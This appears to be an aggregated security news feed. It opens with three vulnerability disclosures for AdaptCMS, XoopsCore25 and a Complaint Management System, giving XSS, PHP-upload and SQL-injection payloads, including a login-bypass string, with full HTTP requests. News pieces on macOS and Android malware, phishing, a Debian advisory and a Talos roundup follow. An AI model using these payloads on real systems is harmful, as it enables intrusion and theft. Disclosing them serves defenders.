Adapt CMS version 3.0.3 suffers from persistent cross site scripting and remote shell upload vulnerabilities.

# Exploit Title: Stored XSS and RCE - adaptcmsv3.0.3  
# Date: 02/2024  
# Exploit Author: Andrey Stoykov  
# Version: 3.0.3  
# Tested on: Ubuntu 22.04  
# Blog: http://msecureltd.blogspot.com

 *Description*

- It was found that adaptcms v3.0.3 was vulnerable to stored cross  
site scripting

- Also the application allowed the file upload functionality to upload  
PHP files which resulted in remote code execution

*Stored XSS*

*Steps to Reproduce:*

   1. Login as admin and add a new article  
   2. In "Title" add the following payload <svg><animate  
onbegin=alert(1) attributeName=x dur=1s>  
   3. The stored XSS would be triggered upon visiting the article by  
normal user

// HTTP POST request

POST /adaptcms/admin/articles/preview/?preview=1 HTTP/1.1

Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

_method=PUT&data%5B_Token%5D%5Bkey%5D=357ba58e7871f0849edd3c623771a379e2fc1a2c&*data%5BArticle%5D%5Btitle%5D=%3Csvg%3E%3Canimate+onbegin%3Dalert(1)+attributeName%3Dx+dur%3D1s%3E*&data%5BArticleValue%5D%5B0%5D%5Bdata%5D=%3Cp%3ETest%3C%2Fp%3E[...]

// HTTP GET request

GET /adaptcms/admin/articles/preview HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

// HTTP response

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
[...]

[...]  
<!DOCTYPE html>  
<html lang="en">  
<head>  
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  *<title>*  
*    AdaptCMS 3.0.3 | <svg><animate onbegin=alert(1) attributeName=x  
dur=1s>  </title>*  
[...]

*Unrestricted File Upload*

*Steps to Reproduce:*

   1. Login as admin and visit the "Media" page  
   2. Click on "Files" then use the "Add File" functionality  
   3. In "File Contents" add the following PHP code <?php phpinfo(); ?>

// HTTP POST request

POST /adaptcms/admin/files/add HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

[...]  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
*Content-Disposition: form-data; name="data[0][File][dir]"*

*uploads/*  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
Content-Disposition: form-data; name="data[0][File][mimetype]"

------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
Content-Disposition: form-data; name="data[0][File][filesize]"

------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
*Content-Disposition: form-data; name="data[File][content]"*

*<?php phpinfo(); ?>*  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
[...]

// HTTP response

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
X-Powered-By: PHP/5.6.40  
*Location: http://192.168.232.133/adaptcms/admin/files  
<http://192.168.232.133/adaptcms/admin/files>*  
[...]

// HTTP GET request

GET /adaptcms/uploads/*test-php.php* HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

// HTTP response

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
X-Powered-By: PHP/5.6.40  
[...]

[...]  
<h1 class="p">*PHP Version 5.6.40*</h1>  
</td></tr>  
</table>  
<table>  
<tr><td class="e">System </td><td class="v">*Linux ubuntu  
6.5.0-15-generic #15~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Jan 12  
18:54:30 UTC 2 x86_64* </td></tr>  
[...]

Adapt CMS 3.0.3 Cross Site Scripting / Shell Upload

XoopsCore25 version 2.5.11 suffers from a cross site scripting vulnerability.

    ## Title: XoopsCore25-2.5.11-XSS-Reflected## Author: nu11secur1ty## Date: 02/12/2024## Vendor: https://xoops.org/## Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.11## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected## Description:The value of the yname request parameter is copied into the value ofan HTML tag attribute which is encapsulated in single quotation marks.The payload '>333< was submitted in the yname parameter. This inputwas echoed unmodified in the application's response. The attacker cantrick the user to visit very dangerous and malicious URL in thissessionSTATUS: HIGH Vulnerability[+]Exploit execution:```POSTPOST /XoopsCore25-2.5.11/htdocs/misc.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160Safari/537.36Connection: closeCache-Control: max-age=0Cookie: xoops_session_65ca21e5=1mc2a5bq1c0m2kh9j1qn5ilqmnOrigin: https://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: https://pwnedhost.com/XoopsCore25-2.5.11/htdocs/misc.php?action=showpopups&type=friend&op=sendform&t=1707748563Content-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 148yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056&action=showpopups&type=friend```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/xoops.org/XoopsCore25-2.5.11)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/02/xoopscore25-2511-xss-reflected.html)## Time spent:01:17:00

XoopsCore25 2.5.11 Cross Site Scripting

Complaint Management System version 2.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: Complaint-Management-System Multiple SQL Injection Vulnerabilities# Date: 02/09/2-24# Exploit Author: Diyar Saadi# Vendor Homepage: https://phpgurukul.com/complaint-management-sytem/# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7259# Version: V 2.0# Tested on: Windows 11 + XAMPP 8.0.301- SQL Injection## Description ##Multiple SQL injection vulnerabilities have been identified in the Complaint Management System V 2.0. These vulnerabilities allow an attacker to manipulate SQL queries through user-controlled input, potentially leading to unauthorized access or data disclosure , The vulnerable code is in the `complaint-details.php ` file within the `admin` directory. The `cid` parameter .# Proof Of Ceoncept ##--> During forward the payload the response time is expand at least 5 second .--> Payload: 1' AND SLEEP(5) --Request :httpGET /admin/complaint-details.php?cid=1%27%20AND%20SLEEP(5)%20-- HTTP/1.1Host: localhostCookie: PHPSESSID=h08ab7d2umqg507c1392g0opmpSec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: close# SQL Injection Vulnerability in User Authentications ### Proof Of Concept ##--> Attackers can bypass admin panel by forward the payload .--> Payload : admin'or'1-- from username field and any letter like pwn from password field then click sign in .--> Enjoy :xRequest :POST /admin/index.php HTTP/1.1Host: localhostCookie: PHPSESSID=h08ab7d2umqg507c1392g0opmpContent-Length: 46Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://localhost/admin/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: closeusername=admin%27or%271--&password=pwn&submit=Greetz!Sent with [Proton Mail](https://proton.me/) secure email.

Complaint Management System 2.0 SQL Injection

A list of topics we covered in the week of February 5 to February 11 of 2024

February 9, 2024 - Ivanti has found yet another vulnerability in versions of Connect Secure, Policy Secure, and ZTA gateways.

February 9, 2024 - FBI and CISA have produced guidance about Chinese APT group Volt Typhoon and other groups that use Living off the Land (LOTL) techniques.

February 8, 2024 - LastPass has warned about a fake app called LassPass, available in the Apple App Store.

February 8, 2024 - A criminal group called ResumeLooters has stolen the personal information of over two million job seekers from at least 65 different websites.

February 7, 2024 - Your essential guide to toothbrush security.

 A week in security (February 5 &#8211; February 11) 

Apple macOS users are the target of a new Rust-based backdoor that has been operating under the radar since November 2023.
The backdoor, codenamed RustDoor by Bitdefender, has been found to impersonate an update for Microsoft Visual Studio and target both Intel and Arm architectures.
The exact initial access pathway used to propagate the implant is currently not known, although

macOS Malware / Cyber Threat

Apple macOS users are the target of a new Rust-based backdoor that has been operating under the radar since November 2023.

The backdoor, codenamed **RustDoor** by Bitdefender, has been found to impersonate an update for Microsoft Visual Studio and target both Intel and Arm architectures.

The exact initial access pathway used to propagate the implant is currently not known, although it's said to be distributed as FAT binaries that contain Mach-O files.

Multiple variants of the malware with minor modifications have been detected to date, likely indicating active development. The earliest sample of RustDoor dates back to November 2, 2023.

It comes with a wide range of commands that allow it to gather and upload files, and harvest information about the compromised endpoint.

Some versions also include configurations with details about what data to collect, the list of targeted extensions and directories, and the directories to exclude.

The captured information is then exfiltrated to a command-and-control (C2) server.

The Romanian cybersecurity firm said the malware is likely linked to prominent ransomware families like Black Basta and BlackCat owing to overlaps in C2 infrastructure.

"ALPHV/BlackCat is a ransomware family (also written in Rust), that first made its appearance in November 2021, and that has pioneered the public leaks business model," security researcher Andrei Lapusneau said.

In December 2023, the U.S. government announced that it took down the BlackCat ransomware operation and released a decryption tool that more than 500 affected victims can use to regain access to files locked by the malware.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Alert: New Stealthy "RustDoor" Backdoor Targeting Apple macOS Devices

Debian Linux Security Advisory 5618-1 - Vulnerabilities have been discovered in the WebKitGTK web engine. An anonymous researcher discovered that a maliciously crafted webpage may be able to fingerprint the user. Wangtaiyu discovered that processing web content may lead to arbitrary code execution. Apple discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5618-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
February 08, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-23206 CVE-2024-23213 CVE-2024-23222

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-23206

    An anonymous researcher discovered that a maliciously crafted  
    webpage may be able to fingerprint the user.

CVE-2024-23213

    Wangtaiyu discovered that processing web content may lead to  
    arbitrary code execution.

CVE-2024-23222

    Apple discovered that processing maliciously crafted web content  
    may lead to arbitrary code execution. Apple is aware of a report  
    that this issue may have been exploited.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.42.5-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.42.5-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmXFXGQACgkQAAyEYu0C  
2AJWJA//fFEMVOvrgBf8I2Nnz37Bm/jR4IRM52osjsI6I23tjJ1vA9UR7Y/03QGN  
qOzfOsb6wcRGZfYdEy945N6vf/XN3opl44ApyJ6RHStbQ8EuTw+IXVSKs49x6FBC  
P7glTc3I4R5gYpOKDwc/jQwkB6VeCYPq0LeqgVNx2/Ja0eJ3KUEjXo+yYJbowRj+  
oiR9R+WKIEnz7BdxMbOLrlHc9CpR3UynozFprFha8bKNlyJAq/hwsO546NgYnSQH  
+n/hAad1NDvcptljLHrXjw/GYTVc2lEGoFFr8H8EDVdWrtzSlecHenthIxfjoKL9  
4eWGvilyZJGAKvtlaNRCFNorHTsAcqRUYhDT87TNScU+ONwdk3tdl9d4F/CcTylA  
7ZQGQ1OQk2f5h/E2Ns1CD0KE64+Qv4Eima/A7VNDKc2hXPNavaekIbziVKEJ4r+m  
ypJrJDm+RLeOcDKuyxfz6REQvAOinjMnfPQhMXRCdk4vz3RXl9bEpoao35C2rtLe  
HcL3/tg24hOooj6NJYQRuiKfmrZKhHivNrg4QJ/71Y1/JXtlmLiol6h8nfKKvb19  
ObFGbF27htKmSGXR3Oig5tQWcjhnbH4CSqXoTOYwDPRgb9dutViclKu605A97Fm5  
l5U0fyIT8mwkN/thk8KOE1AtNC2n90Y9Yx/gBPFRypHN+CBQCbY=  
=Lfkz  
-----END PGP SIGNATURE-----

Debian Security Advisory 5618-1

Threat hunters have identified a new variant of Android malware called MoqHao that automatically executes on infected devices without requiring any user interaction.
"Typical MoqHao requires users to install and launch the app to get their desired purpose, but this new variant requires no execution," McAfee Labs said in a report published this week. "While the app is

Mobile Security / Cyber Threat

Threat hunters have identified a new variant of Android malware called **MoqHao** that automatically executes on infected devices without requiring any user interaction.

"Typical MoqHao requires users to install and launch the app to get their desired purpose, but this new variant requires no execution," McAfee Labs said in a report published this week. "While the app is installed, their malicious activity starts automatically."

The campaign's targets include Android users located in France, Germany, India, Japan, and South Korea.

MoqHao, also called Wroba and XLoader (not to be confused with the Windows and macOS malware of the same name), is an Android-based mobile threat that's associated with a Chinese financially motivated cluster dubbed Roaming Mantis (aka Shaoye).

Typical attack chains commence with package delivery-themed SMS messages bearing fraudulent links that, when clicked from Android devices, lead to the deployment of the malware but redirect victims to credential harvesting pages impersonating Apple's iCloud login page when visited from an iPhone.

In July 2022, Sekoia detailed a campaign that compromised at least 70,000 Android devices in France. As of early last year, updated versions of MoqHao have been found to infiltrate Wi-Fi routers and undertake Domain Name System (DNS) hijacking, revealing the adversary's commitment to innovating its arsenal.

The latest iteration of MoqHao continues to be distributed via smishing techniques, but what has changed is that the malicious payload is run automatically upon installation and prompts the victim to grant it risky permissions without launching the app, a behavior previously spotted with bogus apps containing the HiddenAds malware.

What's also received a facelift is that the links shared in the SMS messages themselves are hidden using URL shorteners to increase the likelihood of the attack's success. The content for these messages is extracted from the bio (or description) field from fraudulent Pinterest profiles set up for this purpose.

MoqHao is equipped with several features that allow it to stealthily harvest sensitive information like device metadata, contacts, SMS messages, and photos, call specific numbers with silent mode, and enable/disable Wi-Fi, among others.

McAfee said it has reported the findings to Google, which is said to be "already working on the implementation of mitigations to prevent this type of auto-execution in a future Android version."

The development comes as Chinese cybersecurity firm QiAnXin revealed that a previously unknown cybercrime syndicate named Bigpanzi has been linked to the compromise of Android-based smart TVs and set-top boxes (STBs) in order to corral them into a botnet for conducting distributed denial-of-service (DDoS) attacks.

The operation, active since at least 2015, is estimated to control a botnet comprising 170,000 daily active bots, most of which are located in Brazil. However, 1.3 million distinct Brazilian IP addresses have been associated with Bigpanzi since August 2023.

The infections are made possible by tricking users into installing booby-trapped apps for streaming pirated movies and TV shows through sketchy websites. The campaign was first disclosed by Russian antivirus vendor Doctor Web in September 2023.

"Once installed, these devices transform into operational nodes within their illicit streaming media platform, catering to services like traffic proxying, DDoS attacks, OTT content provision, and pirate traffic," QiAnXin researchers said.

"The potential for Bigpanzi-controlled TVs and STBs to broadcast violent, terroristic, or pornographic content, or to employ increasingly convincing AI-generated videos for political propaganda, poses a significant threat to social order and stability."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

MoqHao Android Malware Evolves with Auto-Execution Capability

By Waqas
The backdoor impersonates a Visual Studio update.
This is a post from HackRead.com Read the original post: New Rust-Based macOS Backdoor Steals Files, Linked to Ransomware Groups

The Trojan.MAC.RustDoor backdoor is potentially linked to the notorious BlackBasta and (ALPHV/BlackCat) ransomware operators.

Bitdefender researchers have discovered a new backdoor targeting macOS devices. The backdoor, dubbed, Trojan.MAC.RustDoor is written in Rust language and can steal specific files, archive them, and upload them to the C2 (command and control) server.

According to the researchers, the backdoor has been active since November 2023. While Bitdefender could not attribute the campaign to a known threat actor, artefacts and indicators of compromise (IoCs) suggest a possible relationship with BlackBasta and ALPHV/BlackCat ransomware operators.

The backdoor impersonates a Visual Studio update, distributed as FAT binaries with Mach-O files for Intel x86\_64 and ARM architectures. Samples identified by Bitdefender were titled:

*   zshrc2
*   Previewers
*   VisualStudioUpdater
*   VisualStudioUpdating
*   visualstudioupdate
*   VisualStudioUpdater\_Patch
*   DO\_NOT\_RUN\_ChromeUpdates

The first samples were found in November 2023 and the newest on 2nd February 2024. The Rust-based source code makes it harder for security researchers to analyze and detect its malicious code, potentially giving malware authors an advantage.

The backdoor has multiple variants, named Variant 1, Variant 2, and Variant Zero, with most samples sharing core functionalities. Variant 1 is a testing version, first seen on 22nd November 2023, and contains an embedded plist file. It is meant to ensure persistence using LaunchAgents but does not include a field for this method.

The second variant, found on 30th November 2023, is an upgraded version of the malware, containing a complex JSON configuration and an embedded Apple script for data exfiltration. The script is used to exfiltrate documents with specific extensions and sizes from Documents and Desktop folders, as well as user notes stored in SQLite format.

Variant Zero, discovered on 2nd February 2024, is the least complex variant, lacking Apple script and embedded configuration, despite its backdoor functionality.

All samples contain the backdoor functionality, with supported commands such as ps, shell, cd, mkdir, rm, rmdir, sleep, upload, botkill, dialog, taskkill, and download. These commands allow the malware to gather and upload files and gather information about the machine.

Additionally, the information extracted with the sysctl command and the output of two other commands (pwd and hostname) are submitted to the Register endpoint of the C&C server to receive a Victim ID.

According to Bitdefender’s blog post, communication with the C2 servers is performed using endpoints such as POST /gateway/register, POST /gateway/report, /gateway/task, and /tasks/upload\_file. The C2 servers are currently answering with “detail”: “Not found.”

Trojan.MAC.RustDoor is a malware family that employs multiple persistence mechanisms, including lock\_in\_cron, lock\_in\_launch, lock\_in\_dock, and lock\_in\_rc. These methods are common in recent malware families but not as popular. Lock\_in\_cron involves using cronjobs, while lock\_in\_launch uses LaunchAgents to execute the binary every time a user logs in.

Lock\_in\_rc is achieved by modifying the ~/.zshrc file to execute the binary every time a new ZSH session is opened. Lock\_in\_dock is achieved by adding the binary to the Dock using the command defaults write com.apple.dock persistent-apps -array-add.

This is an ongoing research. Hackread.com will update readers when new details are shared regarding the likely threat actors behind this operation.

****RELATED ARTICLES****

1.  **Bluetooth Flaw Enables Keystroke Injection on macOS, iOS**
2.  **New JaskaGO Malware Targets Mac for Crypto, Browser Data**
3.  **Lazarus Group uses KandyKorn macOS malware for crypto theft**
4.  **Cracked macOS Software Laced with New Trojan Proxy Malware**
5.  **New Malware Turns Windows and macOS Devices into Proxy Nodes**

New Rust-Based macOS Backdoor Steals Files, Linked to Ransomware Groups

By Deeba Ahmed
Blank Image, Fake Link: Unraveling the Temu Phishing Scam Targeting Senior Shoppers!
This is a post from HackRead.com Read the original post: Over 800 Phony “Temu” Domains Lure Shoppers into Credential Theft

Stay alert against Temu phishing scams: Cybersecurity experts warn of scammers using fake giveaways to steal credentials. Over 800 new ‘Temu’ domains registered in the past 3 months.

Temu is the latest brand chosen by scammers for their phishing scams. Checkpoint’s Harmony Email’s cybersecurity researcher Jeremy Fuchs, has noted that hackers are using Temu’s giveaway rewards to entice users to give away their credentials, with over 800 new domains registered as “Temu” in the last three months.

For your information, Temu is an international e-commerce store having 40% of its user base in the USA. It offers discounted goods shipped directly to consumers. Temu was launched in 2022 and is available in 48 countries, including Europe, the Middle East, Southeast Asia, and Australia.

As of February 7, 2024, it is the number one shopping app on Google Play Store and second on the Apple App Store. The app’s most frequent shoppers are senior citizens, mostly 59 and above.

The sample phishing email identified by researchers claims to be from Temu Rewards. However, if you look closely, it is sent by an unrelated email address- onmicrosoft.com. The email contains a blank image and a link to a credential harvesting page. The threat actors try to attract recipients by informing them that they have won.

According to Checkpoint’s blog post, the email has Temu’s name as the sender. However, if the user realizes the sender address isn’t related to Temu or the links don’t lead to a Temu page, they’ll stay away from this scam. The email should raise suspicion as it is sent from a generic address on onmicrosoft (.) com, and the image does not load.

One of the phishing emails used in the scam (Check Point)

****Brand Names and Phishing****

This isn’t the first time threat actors have exploited brand names and the latest trends to steal credentials or other sensitive information from innocent users.

In November 2022, Hackread reported that Cyjax researchers discovered a sophisticated phishing campaign targeting over 400 brands across various sectors. The scammers, likely having Chinese affiliations, used 42,000 domains to distribute malware and generate ad revenue with at least 24,000 survey/landing domains used to promote the scam.

Cybersecurity researchers at Bloster AI recently discovered a USPS Delivery phishing campaign utilizing advanced techniques to target victims in the US. Bolster’s CheckPhish detected over 3,000 phishing domains mimicking Walmart. The campaign tricked consumers into thinking they had failed deliveries and late payments. Threat actors have improved their attack tactics, transitioning from deceptive messages to luring victims into downloading financial or banking data-stealing apps.

A phishing scam targeting Meta Platforms, Inc. business owners to steal their email addresses and passwords, leading to the takeover of their Facebook page, profile, and financial information was discovered in January 2024. The scam used Meta Platforms’ authority to create urgency and legitimacy.

****Temu and Cybersecurity****

Temu itself has faced several cybersecurity-related issues, including allegations of collecting user and device data such as text messages and banking information.

In November 2023, a class-action lawsuit was filed in the United States, alleging that the company had unlawfully collected its customers’ data. Furthermore, another report surfaced, implicating Temu in the unauthorized disclosure of customer data, particularly in connection with data purportedly appearing for sale on the dark web after customers make purchases through the app.

Nevertheless, it’s crucial to emphasize basic security measures with users and ensure that all threats can be stopped, both simple and sophisticated, especially scams like these, which exploit users’ trust in big brands.

Additionally, to protect against phishing attacks, security professionals must implement AI-based security, robust URL protection, and full-suite security to scan documents and files.

****RELATED ARTICLES****

1.  **Fake LastPass Password Manager App Lurks on iOS App Store**
2.  **Google Suspends Chinese Shopping App Pinduoduo Over Malware**
3.  **Google Removes Swing VPN Android App Exposed as DDoS Botnet**
4.  **Check Point Research: Microsoft the Most Phished Brand in Q2 2023**
5.  **Domain Squatting and Brand Hijacking: A Threat to Digital Enterprises**

Over 800 Phony “Temu” Domains Lure Shoppers into Credential Theft

For their part, the U.S. did roll out new restrictions on the visas of any foreign individuals who misuse commercial spyware.

Thursday, February 8, 2024 14:00

Private and public efforts to curb the use of spyware and activity of other “mercenary” groups have heated up over the past week, with the U.S. government taking additional action against spyware users and some of the world’s largest tech companies calling out international governments to do more. 

The illegal use of spyware to target high-profile or at-risk individuals is a global problem, as highlighted by this article from The Register that Talos’ Nick Biasini just contributed to. This software can often track targets’ exact location, steal their messages and personal information, or even listen in on phone calls. And as we’ve written about, many Private Sector Offensive Actors (PSOAs) are developing spyware and selling it to whoever is willing to pay, regardless of what their motives are. 

A group of nations including the U.S., U.K. and France, along with several Fortune 500 tech companies, signed an agreement Tuesday to work to limit the use of spyware across the globe and crack down harder on bad actors who are illegally selling and using the software. However, the language of the resolution seemed closer to aspirations than actual action. 

For their part, the U.S. did roll out new restrictions on the visas of any foreign individuals who misuse commercial spyware. The restrictions could also affect anyone who makes the spyware, profits off its sale or facilitates the sale of the technology.  

These are all positive steps in the right direction toward curbing the use and sale of commercial spyware, but I remain concerned that the tendrils of spyware are too deep in the security landscape at this point that we’ll be dealing with this issue for years to come. 

Google’s security research group recently found that 20 of the 25 zero-day vulnerabilities Google TAG discovered that were being exploited in the wild in 2023 were exploited by commercial spyware vendors. In the same report, Google TAG said it was actively tracking at least 40 commercial spyware vendors — all with an unknown number of customers, users, creators and employees.  

The general tenants of spyware are all around us, too. While not traditional commercial spyware that’s tracking journalists or dissidents, even just quiet trackers are being used all over the internet. 

A report from 404 Media last month found that the apps of several popular sites like the 9gag forum and Kik messaging app were part of a massive network of ad tracking. Reporters found that ads inside each app are sending information to a powerful mass monitoring tool, which is then advertised and sold to national security agencies. This information can quietly build profiles out of users that could be used in many ways (though hopefully just for targeted ads, in the absolute best-case scenario), including tracking their hobbies, family members and physical location. 

Meta’s popular social media sites Instagram and Facebook have their own sets of tracking tools that can even monitor users’ web activity outside of their apps and require users to manually turn that feature off. Some mercenary groups are even embedding spyware into online ads and spreading spyware with little to no protection on mobile devices. 

Just as with ransomware, the problem of addressing spyware and PSOAs is going to take an international, public-private effort, and it certainly won’t be solved overnight. But I believe it will take more than good faith resolutions to change the way our internet activity is tracked, and how attackers can exploit that in a worst-case scenario.  

One such way we can start taking steps to immediately curb the spread of spyware is with greater communication. Talos encourages any organization, public or private, to publicly share actionable information or detection content related to spyware discovered in the wild. Public disclosure is often limited in the number of technical details of how the spyware itself works or does not contain many IOCs.  

If readers suspect their system(s) may have been compromised by commercial spyware or hack-for-hire groups, please consider notifying Talos’ research team at no-spyware@external.cisco.com to assist in furthering the community’s knowledge of these threats. 

**The one big thing **

Cisco Talos discovered a new, stealthy espionage campaign that has likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family named “Zardoor.” Talos believes an advanced threat actor is carrying out this attack, based on the deployment of the custom backdoor Zardoor, the use of modified reverse proxy tools, and the ability to evade detection for several years. In at least one attack, the actors have infected an Islamic charitable non-profit organization in Saudi Arabia, often exfiltrating data multiple times in a month. 

**Why do I care? **

At this time, we have only discovered one compromised target, however, the threat actor’s ability to maintain long-term access to the victim’s network without discovery suggests there could be other victims that we don’t know about yet. This also is the work of a yet-to-be-discovered threat actor, as Talos cannot pin the exact TTPs onto a known threat actor. Zardoor is a dangerous backdoor that can remain undetected for extended periods, and without a ton of prior information about this actor, it’s tough to predict where they might pivot next. 

**So now what? **

Talos has released new ClamAV signatures and Snort rules to protect against Zardoor and the actors’ actions. We don’t know what the initial access vector is, so it’s tough to give targeted advice on how to avoid this malware, but having any endpoint detection in place will block this backdoor.  

**Top security headlines of the week **

**Adversaries are actively exploiting three vulnerabilities in Ivanti’s VPN software,** including one newly discovered over the weekend. Ivanti first disclosed two vulnerabilities on Jan. 22 affecting Ivanti’s Connect Secure and Policy Secure VPN products. Eventually, attackers took notice and started targeting unpatched instances of the software. Shortly after disclosure, the U.S. Cybersecurity and Infrastructure Security Agency only gave federal agencies 48 hours to disconnect any devices that used the affected software. Patches are now available for the three vulnerabilities, and users are encouraged to update as soon as possible. The CISA directive said that “agencies running the affected products must assume domain accounts associated with the affected products have been compromised” and said that agencies should reset “passwords twice for on premise \[SIC\] accounts, revoke Kerberos tickets, and then revoke tokens for cloud accounts in hybrid deployments” by March 1. It also said, “for cloud joined/registered devices, disable devices in the cloud to revoke the device tokens.” The newest vulnerability, CVE-2024-21893, is a server-side request forgery that could allow an attacker to access certain restricted resources without authentication. (Ars Technica, Decipher) 

**Apple addressed a security issue early in the life of their newly released Apple Vision Pro,** a mixed-reality headset. Days after initial reviews for the product were published, Apple released its first security update for the headset, saying that a vulnerability in the WebKit browser engine “may have been exploited” in the wild. The vulnerability, CVE-2024-23222, also affects other Apple operating systems, including iOS and iPad OS. Vision Pro users also discovered that, before the software patch, they could not reset the password on their device without physically bringing the headset to a retail Apple store. The passcode, typically a series of digits for the headset, could only be reset if the users gave the physical device to Apple support or mailed it to AppleCare. However, Apple added the ability to reset the devices’ passcode in the same patch that fixed the aforementioned vulnerability. (TechCrunch, Bloomberg) 

**Can’t get enough Talos? ** 

*   February Threat Spotlight: Post Compromise Attacks 
*   How are user credentials stolen and used by threat actors? 
*   Talos Takes Ep. #171: How are attackers using malicious drivers in Windows to stay undetected? 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd 

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934   
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c   
**Typical Filename:** Wextract   
**Claimed Product:** Internet Explorer   
**Detection Name:** W32.File.MalParent 

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440   
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e   
**Typical Filename:** iizbpyilb.bat   
**Claimed Product:** N/A    
**Detection Name:** Trojan.Agent.DDOH 

